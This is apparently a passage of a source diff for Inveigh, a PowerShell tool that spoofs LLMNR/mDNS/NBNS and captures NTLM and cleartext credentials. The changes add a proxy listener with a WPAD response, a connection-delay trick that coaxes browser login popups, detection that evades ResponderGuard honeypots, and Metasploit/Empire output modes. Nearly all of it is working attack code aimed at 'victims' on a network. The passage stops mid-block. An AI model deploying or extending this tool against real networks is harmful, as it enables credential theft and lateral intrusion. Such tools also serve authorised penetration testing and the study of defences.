.PARAMETER HTTPBasicRealm
Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth.
.PARAMETER HTTPContentType
-Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to
+Default = text/html: Content type for HTTP/HTTPS/Proxy responses. Does not apply to EXEs and wpad.dat. Set to
"application/hta" for HTA files or when using HTA code with HTTPResponse.
.PARAMETER HTTPDir
Full directory path to enable hosting of basic content through the HTTP/HTTPS listener.
.PARAMETER HTTPDefaultFile
-Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for
+Filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response file. This file will not be used for
wpad.dat requests.
.PARAMETER HTTPDefaultEXE
-EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests.
+EXE filename within the HTTPDir to serve as the default HTTP/HTTPS/Proxy response for EXE requests.
+
+.PARAMETER HTTPResetDelay
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will have a delay before their connections are reset when Inveigh doesn't receive data. This can increase the
+chance of capturing authentication through a popup box with some browsers (Firefox).
+
+.PARAMETER HTTPResetDelayTimeout
+Default = 30 Seconds: HTTPResetDelay timeout in seconds.
.PARAMETER HTTPResponse
-String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests.
+Content to serve as the default HTTP/HTTPS/Proxy response. This response will not be used for wpad.dat requests.
This parameter will not be used if HTTPDir is set. Use PowerShell character escapes and newlines where necessary.
.PARAMETER HTTPS
@@ -104,13 +112,13 @@ Default = Disabled: (Y/N) Force deletion of an existing certificate that matches
HTTPSCertSubject.
.PARAMETER Inspect
-(Switch) Inspect LLMNR an NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do not
-want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be enabled
-with -LLMNR and/or -NBNS.
+(Switch) Inspect LLMNR/mDNS/NBNS traffic only. With elevated privilege, SMB must be disabled with -smb if you do
+not want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desired inspect listeners must be
+enabled.
.PARAMETER IP
-Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS spoofing if
-the SpooferIP parameter is not set.
+Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing
+if the SpooferIP parameter is not set.
.PARAMETER LogOutput
Default = Enabled: (Y/N) Enable/Disable storing log messages in memory.
@@ -163,10 +171,10 @@ running Inveigh through a shell that does not return other output streams.Note t
yellow warning messages if enabled.
.PARAMETER Proxy
-Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures.
+Default = Disabled: (Y/N) Enable/Disable proxy listener authentication captures.
.PARAMETER ProxyAuth
-Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy server authentication type.
+Default = NTLM: (Basic/NTLM/NTLMNoESS) Proxy listener authentication type.
.PARAMETER ProxyIP
Default = Any: IP address for the proxy listener.
@@ -191,20 +199,20 @@ direct targets to the host system's SMB server. Block TCP ports 445/139 or kill
prevent login requests from being processed by the Inveigh host.
.PARAMETER SpooferHostsIgnore
-Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS.
+Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferHostsReply
-Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS.
+Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferIP
-IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other
-than the Inveigh host.
+IP address for LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+other than the Inveigh host.
.PARAMETER SpooferIPsIgnore
-Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS.
+Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferIPsReply
-Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS.
+Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferLearning
Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out
@@ -230,7 +238,7 @@ Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running serv
Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
.PARAMETER RunCount
-Default = Unlimited: (Integer) Number of captures to perform before auto-exiting.
+Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2/cleartext captures to perform before auto-exiting.
.PARAMETER RunTime
(Integer) Run time duration in minutes.
@@ -241,12 +249,12 @@ PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and
0 = None, 1 = Metasploit/Meterpreter, 2 = Empire
.PARAMETER WPADAuth
-Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests.
+Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS listener authentication type for wpad.dat requests.
Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag
during negotiation.
.PARAMETER WPADAuthIgnore
-Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login
popups for authenticated wpad.dat requests such as Firefox.
@@ -289,7 +297,7 @@ Execute with the stealthiest options.
.EXAMPLE
Invoke-Inveigh -Inspect
-Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic.
+Execute in order to only inpect LLMNR/mDNS/NBNS traffic.
.EXAMPLE
Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N
@@ -308,17 +316,19 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
[parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
- [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "",
+ [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
+ [parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
[parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
[parameter(Mandatory=$false)][Int]$mDNSTTL = "120",
[parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
@@ -386,7 +396,7 @@ if ($invalid_parameter)
throw
}
-$inveigh_version = "1.3"
+$inveigh_version = "1.3.2"
if(!$IP)
{
@@ -526,7 +536,7 @@ if($StartupChecks -eq 'Y')
if($Proxy -eq 'Y')
{
- $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
+ $proxy_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort "
}
if($LLMNR -eq 'Y' -and !$elevated_privilege)
@@ -588,6 +598,7 @@ if($Inspect)
if($elevated_privilege)
{
$LLMNR = "N"
+ $mDNS = "N"
$NBNS = "N"
$HTTP = "N"
$HTTPS = "N"
@@ -615,7 +626,7 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.tool = 2
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
- $inveigh.newline = "`n"
+ $inveigh.newline = "`n" # remove for Empire 2.0
$LogOutput = "N"
$ShowHelp = "N"
@@ -720,10 +731,7 @@ if($mDNS -eq 'Y')
if($elevated_privilege -or !$mDNS_port_check)
{
- $inveigh.status_queue.Add("mDNS Spoofer = Enabled") > $null
- $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
$mDNSTypes_output = $mDNSTypes -join ","
- $mDNS_response_message = "- response sent"
if($mDNSTypes.Count -eq 1)
{
@@ -734,6 +742,9 @@ if($mDNS -eq 'Y')
$inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
}
+ $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
+ $mDNS_response_message = "- response sent"
+
}
else
{
@@ -996,7 +1007,7 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
if($WPADAuthIgnore.Count -gt 0)
{
- $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null
+ $inveigh.status_queue.Add("WPAD NTLM Authentication Ignore List = " + ($WPADAuthIgnore -join ",")) > $null
}
}
@@ -1032,34 +1043,53 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
}
- if($Proxy -eq 'Y')
+ $HTTPResetDelay = ($HTTPResetDelay | Where-Object {$_ -and $_.Trim()})
+
+ if($HTTPResetDelay.Count -gt 0)
{
- $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
- $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
- $ProxyPortFailover = $ProxyPort + 1
- $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+ $inveigh.status_queue.Add("HTTP Reset Delay List = " + ($HTTPResetDelay -join ",")) > $null
+ $inveigh.status_queue.Add("HTTP Reset Delay Timeout = $HTTPResetDelayTimeout Seconds") > $null
+ }
- if($ProxyIgnore.Count -gt 0)
- {
- $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null
- }
+ if($Proxy -eq 'Y')
+ {
- if($ProxyIP -eq '0.0.0.0')
+ if($proxy_port_check)
{
- $proxy_WPAD_IP = $IP
+ $Proxy = "N"
+ $inveigh.status_queue.Add("Proxy Capture Disabled Due To In Use Port $ProxyPort") > $null
}
else
{
- $proxy_WPAD_IP = $ProxyIP
- }
+ $inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
+ $inveigh.status_queue.Add("Proxy Port = $ProxyPort") > $null
+ $inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
+ $ProxyPortFailover = $ProxyPort + 1
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("Proxy Ignore List = " + ($ProxyIgnore -join ",")) > $null
+ }
+
+ if($ProxyIP -eq '0.0.0.0')
+ {
+ $proxy_WPAD_IP = $IP
+ }
+ else
+ {
+ $proxy_WPAD_IP = $ProxyIP
+ }
+
+ if($WPADIP -and $WPADPort)
+ {
+ $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}"
+ }
+ else
+ {
+ $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}"
+ }
- if($WPADIP -and $WPADPort)
- {
- $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $WPADIP`:$WPADPort; DIRECT`";}"
- }
- else
- {
- $WPADResponse = "function FindProxyForURL(url,host){$WPAD_direct_hosts_function return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_wpad_IP`:$ProxyPortFailover; DIRECT`";}"
}
}
@@ -1235,13 +1265,31 @@ if($inveigh.status_output)
{$_ -like "* Disabled Due To *" -or $_ -like "Run Stop-Inveigh to stop Inveigh" -or $_ -like "Windows Firewall = Enabled"}
{
- Write-Warning ($inveigh.status_queue[0] + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.status_queue[0])
+ }
+
$inveigh.status_queue.RemoveAt(0)
}
default
{
- Write-Output ($inveigh.status_queue[0] + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.status_queue[0])
+ }
+
$inveigh.status_queue.RemoveAt(0)
}
@@ -1467,7 +1515,8 @@ $SMB_NTLM_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
$HTTP_scriptblock =
{
- param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResetDelay,$HTTPResetDelayTimeout,$HTTPResponse,
+ $HTTPS_listener,$NBNSBruteForcePause,$Proxy,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse)
function NTLMChallengeBase64
{
@@ -1520,7 +1569,6 @@ $HTTP_scriptblock =
$NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
$NTLM = "NTLM " + $NTLM_challenge_base64
- $NTLM_challenge = $HTTP_challenge
return $NTLM
}
@@ -1619,7 +1667,7 @@ $HTTP_scriptblock =
$HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
}
- [byte[]]$SSL_request_bytes = $null
+ [Byte[]]$SSL_request_bytes = $null
do
{
@@ -1638,6 +1686,15 @@ $HTTP_scriptblock =
$HTTP_stream = $HTTP_client.GetStream()
}
+ if($HTTP_stream.DataAvailable)
+ {
+ $HTTP_data_available = $true
+ }
+ else
+ {
+ $HTTP_data_available = $false
+ }
+
while($HTTP_stream.DataAvailable)
{
$HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
@@ -1673,6 +1730,14 @@ $HTTP_scriptblock =
$HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
$HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
+
+ if($HTTPResetDelay.Count -gt 0 -and ($HTTPResetDelay | Where-Object {$HTTP_header_user_agent -match $_}))
+ {
+ $HTTP_reset_delay = $true
+ $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
+ $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
+
}
if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
@@ -1695,7 +1760,7 @@ $HTTP_scriptblock =
$inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
}
- if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
+ if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
@@ -1712,7 +1777,7 @@ $HTTP_scriptblock =
}
}
-
+
if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
{
$HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
@@ -1783,9 +1848,10 @@ $HTTP_scriptblock =
$HTTP_POST_request_old = $HTTP_POST_request
}
-
+
if($HTTP_header_authorization.StartsWith('NTLM '))
{
+
$HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
[Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
@@ -2079,6 +2145,7 @@ $HTTP_scriptblock =
if($HTTP_client_close)
{
+ $HTTP_reset_delay = $false
if($proxy_listener)
{
@@ -2094,8 +2161,18 @@ $HTTP_scriptblock =
}
else
{
- $HTTP_client.Close()
- $HTTP_client_close = $true
+
+ if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
+ {
+ $HTTP_client.Close()
+ $HTTP_client_close = $true
+ $HTTP_reset_delay = $false
+ }
+ else
+ {
+ Start-Sleep -m 100
+ }
+
}
}
@@ -2430,12 +2507,12 @@ $sniffer_scriptblock =
}
}
-
+
if(($inveigh.valid_host_list -notcontains $NBNS_query_string -or $SpooferHostsReply -contains $NBNS_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $NBNS_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $NBNS_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and ($NBNS_query_string.Trim() -ne '*') -and (
$SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and ($source_IP -ne $IP) -and (
- $NBNSTypes -contains $NBNS_query_type))
+ $NBNSTypes -contains $NBNS_query_type) -and $destination_IP.IPAddressToString -ne $IP)
{
if($SpooferLearning -eq 'N' -or !$NBNS_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
@@ -2500,6 +2577,10 @@ $sniffer_scriptblock =
{
$NBNS_response_message = "- local request"
}
+ elseif($destination_IP.IPAddressToString -eq $IP)
+ {
+ $NBNS_response_message = "- ResponderGuard detected and ignored"
+ }
else
{
$NBNS_response_message = "- something went wrong"
@@ -2822,7 +2903,8 @@ $sniffer_scriptblock =
if(($inveigh.valid_host_list -notcontains $LLMNR_query_string -or $SpooferHostsReply -contains $LLMNR_query_string) -and (!$SpooferHostsReply -or $SpooferHostsReply -contains $LLMNR_query_string) -and (
!$SpooferHostsIgnore -or $SpooferHostsIgnore -notcontains $LLMNR_query_string) -and (!$SpooferIPsReply -or $SpooferIPsReply -contains $source_IP) -and (
!$SpooferIPsIgnore -or $SpooferIPsIgnore -notcontains $source_IP) -and ($inveigh.spoofer_repeat -or $inveigh.IP_capture_list -notcontains $source_IP.IPAddressToString) -and (
- $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)))
+ $SpooferLearning -eq 'N' -or ($SpooferLearning -eq 'Y' -and !$SpooferLearningDelay) -or ($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -ge $spoofer_learning_delay)) -and
+ $destination_IP.IPAddressToString -ne $IP)
{
if($SpooferLearning -eq 'N' -or !$LLMNR_learning_log.Exists({param($s) $s -like "* " + [System.BitConverter]::ToString($payload_bytes[0..1]) + " *"}))
@@ -2838,6 +2920,7 @@ $sniffer_scriptblock =
{
$LLMNR_request_ignore = $true
}
+
}
else
{
@@ -2870,6 +2953,10 @@ $sniffer_scriptblock =
{
$LLMNR_response_message = "- " + [Int]($SpooferLearningDelay - $spoofer_learning_stopwatch.Elapsed.TotalMinutes) + " minute(s) until spoofing starts"
}
+ elseif($destination_IP.IPAddressToString -eq $IP)
+ {
+ $LLMNR_response_message = "- ResponderGuard detected and ignored"
+ }
else
{
$LLMNR_response_message = "- something went wrong"
@@ -3696,21 +3783,24 @@ $control_scriptblock =
}
- Start-Sleep -S 1
- $inveigh.console_queue.Add("Inveigh exited at $(Get-Date -format 's')")
-
- if($inveigh.file_output)
+ if($inveigh.running)
{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
+ Start-Sleep -S 1
+ $inveigh.console_queue.Add("Inveigh exited due to $exit_message at $(Get-Date -format 's')")
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
- }
+ if($inveigh.file_output)
+ {
+ $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
- Start-Sleep -S 1
- $inveigh.running = $false
+ if($inveigh.log_output)
+ {
+ $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited due to $exit_message")
+ }
+
+ Start-Sleep -S 1
+ $inveigh.running = $false
+ }
if($inveigh.relay_running)
{
@@ -3771,10 +3861,6 @@ $control_scriptblock =
StopInveigh "run count"
}
- $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count
- $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count
- $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count
-
}
if($RunTime)
@@ -3855,7 +3941,8 @@ function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
+ $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
@@ -3877,7 +3964,8 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
+ $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
@@ -3899,7 +3987,8 @@ function ProxyListener()
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument(
+ $HTTPResetDelay).AddArgument($HTTPResetDelayTimeout).AddArgument($HTTPResponse).AddArgument(
+ $HTTPS_listener).AddArgument($NBNSBruteForcePause).AddArgument($Proxy).AddArgument(
$ProxyIgnore).AddArgument($proxy_listener).AddArgument($WPADAuth).AddArgument(
$WPADAuthIgnore).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
@@ -4067,188 +4156,238 @@ if($ConsoleQueueLimit -ge 0 -or $inveigh.file_output -or $NBNSBruteForcePause -o
}
# Console Output Loop
-if($inveigh.console_output)
+try
{
- if($ConsoleStatus)
- {
- $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
- $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ if($inveigh.console_output)
{
- while($inveigh.console_queue.Count -gt 0)
- {
+ if($ConsoleStatus)
+ {
+ $console_status_timeout = New-TimeSpan -Minutes $ConsoleStatus
+ $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+ }
- switch -wildcard ($inveigh.console_queue[0])
+ :console_loop while(($inveigh.running -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
{
- {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
- {
- Write-Warning ($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
-
- {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ switch -wildcard ($inveigh.console_queue[0])
{
- if($ConsoleOutput -eq 'Y')
+ {$_ -like "* written to *" -or $_ -like "* for relay *" -or $_ -like "*SMB relay *" -or $_ -like "* local administrator *"}
{
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- }
- $inveigh.console_queue.RemoveAt(0)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Warning($inveigh.console_queue[0])
+ }
- }
+ $inveigh.console_queue.RemoveAt(0)
+ }
- {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
- {
-
- if($ConsoleOutput -ne "Low")
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
{
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- }
- $inveigh.console_queue.RemoveAt(0)
+ if($ConsoleOutput -eq 'Y')
+ {
- }
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
- default
- {
- Write-Output ($inveigh.console_queue[0] + $inveigh.newline)
- $inveigh.console_queue.RemoveAt(0)
- }
+ }
- }
+ $inveigh.console_queue.RemoveAt(0)
- }
+ }
- if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
- {
-
- if($inveigh.cleartext_list.Count -gt 0)
- {
- Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
- $inveigh.cleartext_list.Sort()
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
- foreach($unique_cleartext in $inveigh.cleartext_list)
- {
- if($unique_cleartext -ne $unique_cleartext_last)
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
{
- Write-Output($unique_cleartext + $inveigh.newline)
+
+ if($inveigh.output_stream_only)
+ {
+ Write-Output($inveigh.console_queue[0] + $inveigh.newline)
+ }
+ else
+ {
+ Write-Output($inveigh.console_queue[0])
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
}
- $unique_cleartext_last = $unique_cleartext
}
- Start-Sleep -m 5
- }
- else
- {
- Write-Output("$(Get-Date -format 's') - No cleartext credentials have been captured" + $inveigh.newline)
}
- if($inveigh.POST_request_list.Count -gt 0)
+ if($ConsoleStatus -and $console_status_stopwatch.Elapsed -ge $console_status_timeout)
{
- Write-Output("$(Get-Date -format 's') - Current unique POST request captures:" + $inveigh.newline)
- $inveigh.POST_request_list.Sort()
-
- foreach($unique_POST_request in $inveigh.POST_request_list)
+
+ if($inveigh.cleartext_list.Count -gt 0)
{
- if($unique_POST_request -ne $unique_POST_request_last)
+ Write-Output("$(Get-Date -format 's') - Current unique cleartext captures:" + $inveigh.newline)
+ $inveigh.cleartext_list.Sort()
+
+ foreach($unique_cleartext in $inveigh.cleartext_list)
{
- Write-Output($unique_POST_request + $inveigh.newline)
+ if($unique_cleartext -ne $unique_cleartext_last)
+ {
+ Write-Output($unique_cleartext + $inveigh.newline)
+ }
+
+ $unique_cleartext_last = $unique_cleartext
}
- $unique_POST_request_last = $unique_POST_request
+ Start-Sleep -m 5
+ }
+ else
+ {
